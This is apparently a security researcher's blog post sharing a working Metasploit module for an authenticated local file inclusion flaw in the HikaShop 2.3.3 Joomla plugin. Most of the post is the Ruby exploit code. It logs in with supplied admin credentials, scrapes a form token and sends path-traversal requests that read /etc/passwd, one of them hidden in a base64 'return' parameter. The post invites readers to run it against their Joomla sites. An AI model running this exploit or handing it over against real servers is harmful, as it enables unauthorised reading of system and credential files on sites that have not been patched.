Nearly 2 weeks ago
I wrote a little article about vulnerabilities in multiple plugins for Joomla.
Here we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.
Below you will find a dirty MSF poc for LFI vulnerability located in
HikaShop 2.3.3. ;)
Let me know if your Joomla is vulnerable. ;) If you will have any troubles with running this poc,
just
check how I've done that before or feel free to contact me with any questions/suggestions.
Loading exploit:
Running:
... and finally we will get the content of /etc/passwd:
Code:
---<hikashop_auth_lfi.rb>---
root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HikaShop - LFI poc for authenticated users',
'Description' => %q{
HikaShop 2.3.3 is vulnerable to local file include attack.
Authenticated user can read local files from the server.
Vulnerability was described on https://twitter.com/HauntITBlog
},
'Author' =>
[
'HauntIT Blog', # Discovery / msf module
'http://hauntit.blogspot.com'
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '03.01.2015'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
], self.class)
end
def check
end
def fetchMd5(my_string)
if my_string =~ /([0-9a-fA-F]{32})/
return $1
end
return nil
end
def exploit
# 1st, we will get cookies and token
req1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php')
})
cookies = req1['set-cookie']
if not req1
fail_with("[-] Failed with 1st request")
end
print_status("[+] Resp code: " + req1.code.to_s)
print_good("[+] Cookie(s) : " + cookies)
token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
if req1.body =~ token_pattern
token = fetchMd5(req1.body)
print_good("[+] Token : "+ token.to_s)
else
print_status("[-] Token not found")
end
# now we need to do auth using that token and cookies
print_status("[+] 2nd request (post with auth)")
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'option' => 'com_login',
'task' => 'login',
'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
token.to_s => 1
}
})
print_good("[+] Code after auth: " + auth.code.to_s)
# 3rd step: get + post params to lfi
print_status('[+] and now 3rd request...')
xpl = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'vars_get' => {
'option' => 'com_hikashop',
'ctrl' => 'view',
'task' => 'edit',
'id' => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
},
'cookie' => cookies
})
if xpl
print_good("[+] 3rd response code: " + xpl.code.to_s)
print_good("[+] 3rd (full) response body:")
print_status(xpl.body)
else
fail_with("[-] Cannot exploit it :C")
end
end # exploit
end
---<hikashop_auth_lfi.rb>---
And
pastebin version is here.
Happy New Year! ;)